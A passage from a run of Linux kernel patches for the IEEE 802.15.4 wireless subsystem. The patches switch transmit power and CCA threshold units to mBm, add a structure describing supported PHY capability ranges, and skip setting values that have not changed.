int (*set_hw_addr_filt)(struct ieee802154_hw *hw, struct ieee802154_hw_addr_filt *filt, unsigned long changed); - int (*set_txpower)(struct ieee802154_hw *hw, s8 dbm); + int (*set_txpower)(struct ieee802154_hw *hw, s32 dbm); int (*set_lbt)(struct ieee802154_hw *hw, bool on); int (*set_cca_mode)(struct ieee802154_hw *hw, const struct wpan_phy_cca *cca); diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index d750d9778ba7..f3185c71af10 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -207,7 +207,7 @@ static const struct nla_policy nl802154_policy[NL802154_ATTR_MAX+1] = { [NL802154_ATTR_PAGE] = { .type = NLA_U8, }, [NL802154_ATTR_CHANNEL] = { .type = NLA_U8, }, - [NL802154_ATTR_TX_POWER] = { .type = NLA_S8, }, + [NL802154_ATTR_TX_POWER] = { .type = NLA_S32, }, [NL802154_ATTR_CCA_MODE] = { .type = NLA_U32, }, [NL802154_ATTR_CCA_OPT] = { .type = NLA_U32, }, @@ -301,8 +301,8 @@ static int nl802154_send_wpan_phy(struct cfg802154_registered_device *rdev, goto nla_put_failure; } - if (nla_put_s8(msg, NL802154_ATTR_TX_POWER, - rdev->wpan_phy.transmit_power)) + if (nla_put_s32(msg, NL802154_ATTR_TX_POWER, + rdev->wpan_phy.transmit_power)) goto nla_put_failure; finish: diff --git a/net/mac802154/driver-ops.h b/net/mac802154/driver-ops.h index a0533357b9ea..57c1bdbfaa91 100644 --- a/net/mac802154/driver-ops.h +++ b/net/mac802154/driver-ops.h @@ -58,7 +58,7 @@ drv_set_channel(struct ieee802154_local *local, u8 page, u8 channel) return local->ops->set_channel(&local->hw, page, channel); } -static inline int drv_set_tx_power(struct ieee802154_local *local, s8 dbm) +static inline int drv_set_tx_power(struct ieee802154_local *local, s32 dbm) { might_sleep(); From e2eb173aaacd1a1bcd255d3e74ffb719e47eeadb Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:40 +0200 Subject: [PATCH 081/872] ieee802154: change transmit power to mbm This patch change the handling of transmit power level from dbm to mbm. This prepares to handle floating point transmit power levels values. The old netlink 802.15.4 will convert the dbm value to mbm for handling backward compatibility. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 3 ++- include/net/cfg802154.h | 1 + include/net/mac802154.h | 4 ++-- net/ieee802154/nl-mac.c | 4 ++-- net/mac802154/driver-ops.h | 4 ++-- 5 files changed, 9 insertions(+), 7 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index 02b6bb72304d..3a303e4a3c07 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1194,9 +1194,10 @@ at86rf230_set_hw_addr_filt(struct ieee802154_hw *hw, } static int -at86rf230_set_txpower(struct ieee802154_hw *hw, s32 db) +at86rf230_set_txpower(struct ieee802154_hw *hw, s32 mbm) { struct at86rf230_local *lp = hw->priv; + s8 db = mbm / 100; /* typical maximum output is 5dBm with RG_PHY_TX_PWR 0x60, lower five * bits decrease power in 1dB steps. 0x60 represents extra PA gain of diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 47804cddb46f..b5b3f9f43084 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -85,6 +85,7 @@ struct wpan_phy { u8 current_channel; u8 current_page; u32 channels_supported[IEEE802154_MAX_PAGE + 1]; + /* current transmit_power in mBm */ s32 transmit_power; struct wpan_phy_cca cca; diff --git a/include/net/mac802154.h b/include/net/mac802154.h index 400e4e85c53f..e863a8557c0a 100644 --- a/include/net/mac802154.h +++ b/include/net/mac802154.h @@ -171,7 +171,7 @@ struct ieee802154_hw { * Returns either zero, or negative errno. * * set_txpower: - * Set radio transmit power in dB. Called with pib_lock held. + * Set radio transmit power in mBm. Called with pib_lock held. * Returns either zero, or negative errno. * * set_lbt @@ -213,7 +213,7 @@ struct ieee802154_ops { int (*set_hw_addr_filt)(struct ieee802154_hw *hw, struct ieee802154_hw_addr_filt *filt, unsigned long changed); - int (*set_txpower)(struct ieee802154_hw *hw, s32 dbm); + int (*set_txpower)(struct ieee802154_hw *hw, s32 mbm); int (*set_lbt)(struct ieee802154_hw *hw, bool on); int (*set_cca_mode)(struct ieee802154_hw *hw, const struct wpan_phy_cca *cca); diff --git a/net/ieee802154/nl-mac.c b/net/ieee802154/nl-mac.c index 2b4955d7aae5..4ba2e13f7a07 100644 --- a/net/ieee802154/nl-mac.c +++ b/net/ieee802154/nl-mac.c @@ -117,7 +117,7 @@ static int ieee802154_nl_fill_iface(struct sk_buff *msg, u32 portid, rtnl_unlock(); if (nla_put_s8(msg, IEEE802154_ATTR_TXPOWER, - params.transmit_power) || + params.transmit_power / 100) || nla_put_u8(msg, IEEE802154_ATTR_LBT_ENABLED, params.lbt) || nla_put_u8(msg, IEEE802154_ATTR_CCA_MODE, params.cca.mode) || @@ -510,7 +510,7 @@ int ieee802154_set_macparams(struct sk_buff *skb, struct genl_info *info) ops->get_mac_params(dev, ¶ms); if (info->attrs[IEEE802154_ATTR_TXPOWER]) - params.transmit_power = nla_get_s8(info->attrs[IEEE802154_ATTR_TXPOWER]); + params.transmit_power = nla_get_s8(info->attrs[IEEE802154_ATTR_TXPOWER]) * 100; if (info->attrs[IEEE802154_ATTR_LBT_ENABLED]) params.lbt = nla_get_u8(info->attrs[IEEE802154_ATTR_LBT_ENABLED]); diff --git a/net/mac802154/driver-ops.h b/net/mac802154/driver-ops.h index 57c1bdbfaa91..d289ae3f1e93 100644 --- a/net/mac802154/driver-ops.h +++ b/net/mac802154/driver-ops.h @@ -58,7 +58,7 @@ drv_set_channel(struct ieee802154_local *local, u8 page, u8 channel) return local->ops->set_channel(&local->hw, page, channel); } -static inline int drv_set_tx_power(struct ieee802154_local *local, s32 dbm) +static inline int drv_set_tx_power(struct ieee802154_local *local, s32 mbm) { might_sleep(); @@ -67,7 +67,7 @@ static inline int drv_set_tx_power(struct ieee802154_local *local, s32 dbm) return -EOPNOTSUPP; } - return local->ops->set_txpower(&local->hw, dbm); + return local->ops->set_txpower(&local->hw, mbm); } static inline int drv_set_cca_mode(struct ieee802154_local *local, From 32b23550ad64d9676f2218b3d5de46bacf98ef1d Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:41 +0200 Subject: [PATCH 082/872] ieee802154: change cca ed level to mbm This patch change the handling of cca energy detection level from dbm to mbm. This prepares to handle floating point cca energy detection levels values. The old netlink 802.15.4 will convert the dbm value to mbm for handling backward compatibility. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 3 ++- include/net/cfg802154.h | 1 + include/net/mac802154.h | 5 ++--- net/ieee802154/nl-mac.c | 4 ++-- net/mac802154/driver-ops.h | 4 ++-- 5 files changed, 9 insertions(+), 8 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index 3a303e4a3c07..e68d45ed622e 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1268,9 +1268,10 @@ at86rf23x_get_desens_steps(struct at86rf230_local *lp, s32 level) } static int -at86rf230_set_cca_ed_level(struct ieee802154_hw *hw, s32 level) +at86rf230_set_cca_ed_level(struct ieee802154_hw *hw, s32 mbm) { struct at86rf230_local *lp = hw->priv; + s32 level = mbm / 100; if (level < lp->data->rssi_base_val || level > 30) return -EINVAL; diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index b5b3f9f43084..9ced2c9fdbfc 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -91,6 +91,7 @@ struct wpan_phy { __le64 perm_extended_addr; + /* current cca ed threshold in mBm */ s32 cca_ed_level; /* PHY depended MAC PIB values */ diff --git a/include/net/mac802154.h b/include/net/mac802154.h index e863a8557c0a..71e245605ef8 100644 --- a/include/net/mac802154.h +++ b/include/net/mac802154.h @@ -184,7 +184,7 @@ struct ieee802154_hw { * Returns either zero, or negative errno. * * set_cca_ed_level - * Sets the CCA energy detection threshold in dBm. Called with pib_lock + * Sets the CCA energy detection threshold in mBm. Called with pib_lock * held. * Returns either zero, or negative errno. * @@ -217,8 +217,7 @@ struct ieee802154_ops { int (*set_lbt)(struct ieee802154_hw *hw, bool on); int (*set_cca_mode)(struct ieee802154_hw *hw, const struct wpan_phy_cca *cca); - int (*set_cca_ed_level)(struct ieee802154_hw *hw, - s32 level); + int (*set_cca_ed_level)(struct ieee802154_hw *hw, s32 mbm); int (*set_csma_params)(struct ieee802154_hw *hw, u8 min_be, u8 max_be, u8 retries); int (*set_frame_retries)(struct ieee802154_hw *hw, diff --git a/net/ieee802154/nl-mac.c b/net/ieee802154/nl-mac.c index 4ba2e13f7a07..cdc1cc3543f6 100644 --- a/net/ieee802154/nl-mac.c +++ b/net/ieee802154/nl-mac.c @@ -122,7 +122,7 @@ static int ieee802154_nl_fill_iface(struct sk_buff *msg, u32 portid, nla_put_u8(msg, IEEE802154_ATTR_CCA_MODE, params.cca.mode) || nla_put_s32(msg, IEEE802154_ATTR_CCA_ED_LEVEL, - params.cca_ed_level) || + params.cca_ed_level / 100) || nla_put_u8(msg, IEEE802154_ATTR_CSMA_RETRIES, params.csma_retries) || nla_put_u8(msg, IEEE802154_ATTR_CSMA_MIN_BE, @@ -519,7 +519,7 @@ int ieee802154_set_macparams(struct sk_buff *skb, struct genl_info *info) params.cca.mode = nla_get_u8(info->attrs[IEEE802154_ATTR_CCA_MODE]); if (info->attrs[IEEE802154_ATTR_CCA_ED_LEVEL]) - params.cca_ed_level = nla_get_s32(info->attrs[IEEE802154_ATTR_CCA_ED_LEVEL]); + params.cca_ed_level = nla_get_s32(info->attrs[IEEE802154_ATTR_CCA_ED_LEVEL]) * 100; if (info->attrs[IEEE802154_ATTR_CSMA_RETRIES]) params.csma_retries = nla_get_u8(info->attrs[IEEE802154_ATTR_CSMA_RETRIES]); diff --git a/net/mac802154/driver-ops.h b/net/mac802154/driver-ops.h index d289ae3f1e93..caecd5f43aa7 100644 --- a/net/mac802154/driver-ops.h +++ b/net/mac802154/driver-ops.h @@ -96,7 +96,7 @@ static inline int drv_set_lbt_mode(struct ieee802154_local *local, bool mode) } static inline int -drv_set_cca_ed_level(struct ieee802154_local *local, s32 ed_level) +drv_set_cca_ed_level(struct ieee802154_local *local, s32 mbm) { might_sleep(); @@ -105,7 +105,7 @@ drv_set_cca_ed_level(struct ieee802154_local *local, s32 ed_level) return -EOPNOTSUPP; } - return local->ops->set_cca_ed_level(&local->hw, ed_level); + return local->ops->set_cca_ed_level(&local->hw, mbm); } static inline int drv_set_pan_id(struct ieee802154_local *local, __le16 pan_id) From 72f655e44db9c7e835ceba96dc03cbe979d3f80d Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:42 +0200 Subject: [PATCH 083/872] ieee802154: introduce wpan_phy_supported This patch introduce the wpan_phy_supported struct for wpan_phy. There is currently no way to check if a transceiver can handle IEEE 802.15.4 complaint values. With this struct we can check before if the transceiver supports these values before sending to driver layer. Signed-off-by: Alexander Aring Suggested-by: Phoebe Buckheister Acked-by: Varka Bhadram Cc: Alan Ott Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 8 ++++---- drivers/net/ieee802154/cc2520.c | 2 +- drivers/net/ieee802154/fakelb.c | 30 +++++++++++++++--------------- drivers/net/ieee802154/mrf24j40.c | 2 +- include/net/cfg802154.h | 6 +++++- net/ieee802154/nl-phy.c | 4 ++-- net/ieee802154/nl802154.c | 4 ++-- 7 files changed, 30 insertions(+), 26 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index e68d45ed622e..151d57f4320d 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1579,7 +1579,7 @@ at86rf230_detect_device(struct at86rf230_local *lp) case 3: chip = "at86rf231"; lp->data = &at86rf231_data; - lp->hw->phy->channels_supported[0] = 0x7FFF800; + lp->hw->phy->supported.channels[0] = 0x7FFF800; lp->hw->phy->current_channel = 11; lp->hw->phy->symbol_duration = 16; break; @@ -1587,15 +1587,15 @@ at86rf230_detect_device(struct at86rf230_local *lp) chip = "at86rf212"; lp->data = &at86rf212_data; lp->hw->flags |= IEEE802154_HW_LBT; - lp->hw->phy->channels_supported[0] = 0x00007FF; - lp->hw->phy->channels_supported[2] = 0x00007FF; + lp->hw->phy->supported.channels[0] = 0x00007FF; + lp->hw->phy->supported.channels[2] = 0x00007FF; lp->hw->phy->current_channel = 5; lp->hw->phy->symbol_duration = 25; break; case 11: chip = "at86rf233"; lp->data = &at86rf233_data; - lp->hw->phy->channels_supported[0] = 0x7FFF800; + lp->hw->phy->supported.channels[0] = 0x7FFF800; lp->hw->phy->current_channel = 13; lp->hw->phy->symbol_duration = 16; break; diff --git a/drivers/net/ieee802154/cc2520.c b/drivers/net/ieee802154/cc2520.c index f833b8bb6663..84b28a05c5a1 100644 --- a/drivers/net/ieee802154/cc2520.c +++ b/drivers/net/ieee802154/cc2520.c @@ -653,7 +653,7 @@ static int cc2520_register(struct cc2520_private *priv) ieee802154_random_extended_addr(&priv->hw->phy->perm_extended_addr); /* We do support only 2.4 Ghz */ - priv->hw->phy->channels_supported[0] = 0x7FFF800; + priv->hw->phy->supported.channels[0] = 0x7FFF800; priv->hw->flags = IEEE802154_HW_OMIT_CKSUM | IEEE802154_HW_AACK | IEEE802154_HW_AFILT; diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index dc2bfb600b4b..91bbf030a443 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -149,35 +149,35 @@ static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) priv->hw = hw; /* 868 MHz BPSK 802.15.4-2003 */ - hw->phy->channels_supported[0] |= 1; + hw->phy->supported.channels[0] |= 1; /* 915 MHz BPSK 802.15.4-2003 */ - hw->phy->channels_supported[0] |= 0x7fe; + hw->phy->supported.channels[0] |= 0x7fe; /* 2.4 GHz O-QPSK 802.15.4-2003 */ - hw->phy->channels_supported[0] |= 0x7FFF800; + hw->phy->supported.channels[0] |= 0x7FFF800; /* 868 MHz ASK 802.15.4-2006 */ - hw->phy->channels_supported[1] |= 1; + hw->phy->supported.channels[1] |= 1; /* 915 MHz ASK 802.15.4-2006 */ - hw->phy->channels_supported[1] |= 0x7fe; + hw->phy->supported.channels[1] |= 0x7fe; /* 868 MHz O-QPSK 802.15.4-2006 */ - hw->phy->channels_supported[2] |= 1; + hw->phy->supported.channels[2] |= 1; /* 915 MHz O-QPSK 802.15.4-2006 */ - hw->phy->channels_supported[2] |= 0x7fe; + hw->phy->supported.channels[2] |= 0x7fe; /* 2.4 GHz CSS 802.15.4a-2007 */ - hw->phy->channels_supported[3] |= 0x3fff; + hw->phy->supported.channels[3] |= 0x3fff; /* UWB Sub-gigahertz 802.15.4a-2007 */ - hw->phy->channels_supported[4] |= 1; + hw->phy->supported.channels[4] |= 1; /* UWB Low band 802.15.4a-2007 */ - hw->phy->channels_supported[4] |= 0x1e; + hw->phy->supported.channels[4] |= 0x1e; /* UWB High band 802.15.4a-2007 */ - hw->phy->channels_supported[4] |= 0xffe0; + hw->phy->supported.channels[4] |= 0xffe0; /* 750 MHz O-QPSK 802.15.4c-2009 */ - hw->phy->channels_supported[5] |= 0xf; + hw->phy->supported.channels[5] |= 0xf; /* 750 MHz MPSK 802.15.4c-2009 */ - hw->phy->channels_supported[5] |= 0xf0; + hw->phy->supported.channels[5] |= 0xf0; /* 950 MHz BPSK 802.15.4d-2009 */ - hw->phy->channels_supported[6] |= 0x3ff; + hw->phy->supported.channels[6] |= 0x3ff; /* 950 MHz GFSK 802.15.4d-2009 */ - hw->phy->channels_supported[6] |= 0x3ffc00; + hw->phy->supported.channels[6] |= 0x3ffc00; INIT_LIST_HEAD(&priv->list); priv->fake = fake; diff --git a/drivers/net/ieee802154/mrf24j40.c b/drivers/net/ieee802154/mrf24j40.c index fba2dfd910f7..f2a1bd122a74 100644 --- a/drivers/net/ieee802154/mrf24j40.c +++ b/drivers/net/ieee802154/mrf24j40.c @@ -750,7 +750,7 @@ static int mrf24j40_probe(struct spi_device *spi) devrec->hw->priv = devrec; devrec->hw->parent = &devrec->spi->dev; - devrec->hw->phy->channels_supported[0] = CHANNEL_MASK; + devrec->hw->phy->supported.channels[0] = CHANNEL_MASK; devrec->hw->flags = IEEE802154_HW_OMIT_CKSUM | IEEE802154_HW_AACK | IEEE802154_HW_AFILT; diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 9ced2c9fdbfc..1941d7a79219 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -61,6 +61,10 @@ struct cfg802154_ops { struct wpan_dev *wpan_dev, bool mode); }; +struct wpan_phy_supported { + u32 channels[IEEE802154_MAX_PAGE + 1]; +}; + struct wpan_phy_cca { enum nl802154_cca_modes mode; enum nl802154_cca_opts opt; @@ -84,7 +88,7 @@ struct wpan_phy { */ u8 current_channel; u8 current_page; - u32 channels_supported[IEEE802154_MAX_PAGE + 1]; + struct wpan_phy_supported supported; /* current transmit_power in mBm */ s32 transmit_power; struct wpan_phy_cca cca; diff --git a/net/ieee802154/nl-phy.c b/net/ieee802154/nl-phy.c index 346c6665d25e..cbc0d09351e0 100644 --- a/net/ieee802154/nl-phy.c +++ b/net/ieee802154/nl-phy.c @@ -56,8 +56,8 @@ static int ieee802154_nl_fill_phy(struct sk_buff *msg, u32 portid, nla_put_u8(msg, IEEE802154_ATTR_CHANNEL, phy->current_channel)) goto nla_put_failure; for (i = 0; i < 32; i++) { - if (phy->channels_supported[i]) - buf[pages++] = phy->channels_supported[i] | (i << 27); + if (phy->supported.channels[i]) + buf[pages++] = phy->supported.channels[i] | (i << 27); } if (pages && nla_put(msg, IEEE802154_ATTR_CHANNEL_PAGE_LIST, diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index f3185c71af10..d271879a2174 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -248,7 +248,7 @@ nl802154_send_wpan_phy_channels(struct cfg802154_registered_device *rdev, for (page = 0; page <= IEEE802154_MAX_PAGE; page++) { if (nla_put_u32(msg, NL802154_ATTR_SUPPORTED_CHANNEL, - rdev->wpan_phy.channels_supported[page])) + rdev->wpan_phy.supported.channels[page])) return -ENOBUFS; } nla_nest_end(msg, nl_page); @@ -626,7 +626,7 @@ static int nl802154_set_channel(struct sk_buff *skb, struct genl_info *info) /* check 802.15.4 constraints */ if (page > IEEE802154_MAX_PAGE || channel > IEEE802154_MAX_CHANNEL || - !(rdev->wpan_phy.channels_supported[page] & BIT(channel))) + !(rdev->wpan_phy.supported.channels[page] & BIT(channel))) return -EINVAL; return rdev_set_channel(rdev, page, channel); From fea3318d20776a94afeea0460c6ee9904e60569e Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:43 +0200 Subject: [PATCH 084/872] ieee802154: add several phy supported handling This patch adds support for phy supported handling for all other already existing handling 802.15.4 functionality. We assume now a fully 802.15.4 complaint transceiver at phy allocation. If a transceiver can support 802.15.4 default values only, then the values should be overwirtten by values the transceiver supports. If the transceiver doesn't set the according hardware flags, we assume the 802.15.4 defaults now which cannot be changed. Signed-off-by: Alexander Aring Suggested-by: Phoebe Buckheister Signed-off-by: Marcel Holtmann --- include/net/cfg802154.h | 26 +++++++++++++++++++++++++- include/net/nl802154.h | 22 ++++++++++++++++++++++ net/ieee802154/nl802154.c | 22 +++++++++++++++++----- net/mac802154/main.c | 26 ++++++++++++++++++++++++++ 4 files changed, 90 insertions(+), 6 deletions(-) diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 1941d7a79219..23abd08a310a 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -61,8 +61,32 @@ struct cfg802154_ops { struct wpan_dev *wpan_dev, bool mode); }; +static inline bool +wpan_phy_supported_bool(bool b, enum nl802154_supported_bool_states st) +{ + switch (st) { + case NL802154_SUPPORTED_BOOL_TRUE: + return b; + case NL802154_SUPPORTED_BOOL_FALSE: + return !b; + case NL802154_SUPPORTED_BOOL_BOTH: + return true; + default: + WARN_ON(1); + } + + return false; +} + struct wpan_phy_supported { - u32 channels[IEEE802154_MAX_PAGE + 1]; + u32 channels[IEEE802154_MAX_PAGE + 1], + cca_modes, cca_opts; + enum nl802154_supported_bool_states lbt; + u8 min_minbe, max_minbe, min_maxbe, max_maxbe, + min_csma_backoffs, max_csma_backoffs; + s8 min_frame_retries, max_frame_retries; + size_t tx_powers_size, cca_ed_levels_size; + const s32 *tx_powers, *cca_ed_levels; }; struct wpan_phy_cca { diff --git a/include/net/nl802154.h b/include/net/nl802154.h index f8b5bc997959..055277156eef 100644 --- a/include/net/nl802154.h +++ b/include/net/nl802154.h @@ -162,4 +162,26 @@ enum nl802154_cca_opts { NL802154_CCA_OPT_ATTR_MAX = __NL802154_CCA_OPT_ATTR_AFTER_LAST - 1 }; +/** + * enum nl802154_supported_bool_states - bool states for bool capability entry + * + * @NL802154_SUPPORTED_BOOL_FALSE: indicates to set false + * @NL802154_SUPPORTED_BOOL_TRUE: indicates to set true + * @__NL802154_SUPPORTED_BOOL_INVALD: reserved + * @NL802154_SUPPORTED_BOOL_BOTH: indicates to set true and false + * @__NL802154_SUPPORTED_BOOL_AFTER_LAST: Internal + * @NL802154_SUPPORTED_BOOL_MAX: highest value for bool states + */ +enum nl802154_supported_bool_states { + NL802154_SUPPORTED_BOOL_FALSE, + NL802154_SUPPORTED_BOOL_TRUE, + /* to handle them in a mask */ + __NL802154_SUPPORTED_BOOL_INVALD, + NL802154_SUPPORTED_BOOL_BOTH, + + /* keep last */ + __NL802154_SUPPORTED_BOOL_AFTER_LAST, + NL802154_SUPPORTED_BOOL_MAX = __NL802154_SUPPORTED_BOOL_AFTER_LAST - 1 +}; + #endif /* __NL802154_H */ diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index d271879a2174..fa0c4048b0e8 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -642,7 +642,9 @@ static int nl802154_set_cca_mode(struct sk_buff *skb, struct genl_info *info) cca.mode = nla_get_u32(info->attrs[NL802154_ATTR_CCA_MODE]); /* checking 802.15.4 constraints */ - if (cca.mode < NL802154_CCA_ENERGY || cca.mode > NL802154_CCA_ATTR_MAX) + if (cca.mode < NL802154_CCA_ENERGY || + cca.mode > NL802154_CCA_ATTR_MAX || + !(rdev->wpan_phy.supported.cca_modes & BIT(cca.mode))) return -EINVAL; if (cca.mode == NL802154_CCA_ENERGY_CARRIER) { @@ -650,7 +652,8 @@ static int nl802154_set_cca_mode(struct sk_buff *skb, struct genl_info *info) return -EINVAL; cca.opt = nla_get_u32(info->attrs[NL802154_ATTR_CCA_OPT]); - if (cca.opt > NL802154_CCA_OPT_ATTR_MAX) + if (cca.opt > NL802154_CCA_OPT_ATTR_MAX || + !(rdev->wpan_phy.supported.cca_opts & BIT(cca.opt))) return -EINVAL; } @@ -744,7 +747,11 @@ nl802154_set_backoff_exponent(struct sk_buff *skb, struct genl_info *info) max_be = nla_get_u8(info->attrs[NL802154_ATTR_MAX_BE]); /* check 802.15.4 constraints */ - if (max_be < 3 || max_be > 8 || min_be > max_be) + if (min_be < rdev->wpan_phy.supported.min_minbe || + min_be > rdev->wpan_phy.supported.max_minbe || + max_be < rdev->wpan_phy.supported.min_maxbe || + max_be > rdev->wpan_phy.supported.max_maxbe || + min_be > max_be) return -EINVAL; return rdev_set_backoff_exponent(rdev, wpan_dev, min_be, max_be); @@ -769,7 +776,8 @@ nl802154_set_max_csma_backoffs(struct sk_buff *skb, struct genl_info *info) info->attrs[NL802154_ATTR_MAX_CSMA_BACKOFFS]); /* check 802.15.4 constraints */ - if (max_csma_backoffs > 5) + if (max_csma_backoffs < rdev->wpan_phy.supported.min_csma_backoffs || + max_csma_backoffs > rdev->wpan_phy.supported.max_csma_backoffs) return -EINVAL; return rdev_set_max_csma_backoffs(rdev, wpan_dev, max_csma_backoffs); @@ -793,7 +801,8 @@ nl802154_set_max_frame_retries(struct sk_buff *skb, struct genl_info *info) info->attrs[NL802154_ATTR_MAX_FRAME_RETRIES]); /* check 802.15.4 constraints */ - if (max_frame_retries < -1 || max_frame_retries > 7) + if (max_frame_retries < rdev->wpan_phy.supported.min_frame_retries || + max_frame_retries > rdev->wpan_phy.supported.max_frame_retries) return -EINVAL; return rdev_set_max_frame_retries(rdev, wpan_dev, max_frame_retries); @@ -813,6 +822,9 @@ static int nl802154_set_lbt_mode(struct sk_buff *skb, struct genl_info *info) return -EINVAL; mode = !!nla_get_u8(info->attrs[NL802154_ATTR_LBT_MODE]); + if (!wpan_phy_supported_bool(mode, rdev->wpan_phy.supported.lbt)) + return -EINVAL; + return rdev_set_lbt_mode(rdev, wpan_dev, mode); } diff --git a/net/mac802154/main.c b/net/mac802154/main.c index 08cb32dc8fd3..ddcd6ff8d39c 100644 --- a/net/mac802154/main.c +++ b/net/mac802154/main.c @@ -107,6 +107,15 @@ ieee802154_alloc_hw(size_t priv_data_len, const struct ieee802154_ops *ops) skb_queue_head_init(&local->skb_queue); + /* init supported flags with 802.15.4 default ranges */ + phy->supported.max_minbe = 8; + phy->supported.min_maxbe = 3; + phy->supported.max_maxbe = 8; + phy->supported.min_frame_retries = -1; + phy->supported.max_frame_retries = 7; + phy->supported.max_csma_backoffs = 5; + phy->supported.lbt = NL802154_SUPPORTED_BOOL_FALSE; + return &local->hw; } EXPORT_SYMBOL(ieee802154_alloc_hw); @@ -155,6 +164,23 @@ int ieee802154_register_hw(struct ieee802154_hw *hw) ieee802154_setup_wpan_phy_pib(local->phy); + if (!(hw->flags & IEEE802154_HW_CSMA_PARAMS)) { + local->phy->supported.min_csma_backoffs = 4; + local->phy->supported.max_csma_backoffs = 4; + local->phy->supported.min_maxbe = 5; + local->phy->supported.max_maxbe = 5; + local->phy->supported.min_minbe = 3; + local->phy->supported.max_minbe = 3; + } + + if (!(hw->flags & IEEE802154_HW_FRAME_RETRIES)) { + /* TODO should be 3, but our default value is -1 which means + * no ARET handling. + */ + local->phy->supported.min_frame_retries = -1; + local->phy->supported.max_frame_retries = -1; + } + rc = wpan_phy_register(local->phy); if (rc < 0) goto out_wq; From 791021bf13ec9d0fc14bfd8c9c4b368ace568239 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:44 +0200 Subject: [PATCH 085/872] mac802154: check for really changes This patch adds check if the value is really changed inside pib/mib. If a transceiver do support only one value for e.g. max_be then this will also handle that the driver layer doesn't need to care about handling to set one value only. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- include/net/cfg802154.h | 12 ++++++++++++ net/mac802154/cfg.c | 26 ++++++++++++++++++++++++++ 2 files changed, 38 insertions(+) diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 23abd08a310a..37abc1603285 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -94,6 +94,18 @@ struct wpan_phy_cca { enum nl802154_cca_opts opt; }; +static inline bool +wpan_phy_cca_cmp(const struct wpan_phy_cca *a, const struct wpan_phy_cca *b) +{ + if (a->mode != b->mode) + return false; + + if (a->mode == NL802154_CCA_ENERGY_CARRIER) + return a->opt == b->opt; + + return true; +} + struct wpan_phy { struct mutex pib_lock; diff --git a/net/mac802154/cfg.c b/net/mac802154/cfg.c index c63601582c71..45c4dc39766e 100644 --- a/net/mac802154/cfg.c +++ b/net/mac802154/cfg.c @@ -73,6 +73,10 @@ ieee802154_set_channel(struct wpan_phy *wpan_phy, u8 page, u8 channel) ASSERT_RTNL(); + if (wpan_phy->current_page == page && + wpan_phy->current_channel == channel) + return 0; + ret = drv_set_channel(local, page, channel); if (!ret) { wpan_phy->current_page = page; @@ -91,6 +95,9 @@ ieee802154_set_cca_mode(struct wpan_phy *wpan_phy, ASSERT_RTNL(); + if (wpan_phy_cca_cmp(&wpan_phy->cca, cca)) + return 0; + /* check if phy support this setting */ if (!(local->hw.flags & IEEE802154_HW_CCA_MODE)) return -EOPNOTSUPP; @@ -108,6 +115,9 @@ ieee802154_set_pan_id(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, { ASSERT_RTNL(); + if (wpan_dev->pan_id == pan_id) + return 0; + wpan_dev->pan_id = pan_id; return 0; } @@ -121,6 +131,10 @@ ieee802154_set_backoff_exponent(struct wpan_phy *wpan_phy, ASSERT_RTNL(); + if (wpan_dev->min_be == min_be && + wpan_dev->max_be == max_be) + return 0; + if (!(local->hw.flags & IEEE802154_HW_CSMA_PARAMS)) return -EOPNOTSUPP; @@ -135,6 +149,9 @@ ieee802154_set_short_addr(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, { ASSERT_RTNL(); + if (wpan_dev->short_addr == short_addr) + return 0; + wpan_dev->short_addr = short_addr; return 0; } @@ -148,6 +165,9 @@ ieee802154_set_max_csma_backoffs(struct wpan_phy *wpan_phy, ASSERT_RTNL(); + if (wpan_dev->csma_retries == max_csma_backoffs) + return 0; + if (!(local->hw.flags & IEEE802154_HW_CSMA_PARAMS)) return -EOPNOTSUPP; @@ -164,6 +184,9 @@ ieee802154_set_max_frame_retries(struct wpan_phy *wpan_phy, ASSERT_RTNL(); + if (wpan_dev->frame_retries == max_frame_retries) + return 0; + if (!(local->hw.flags & 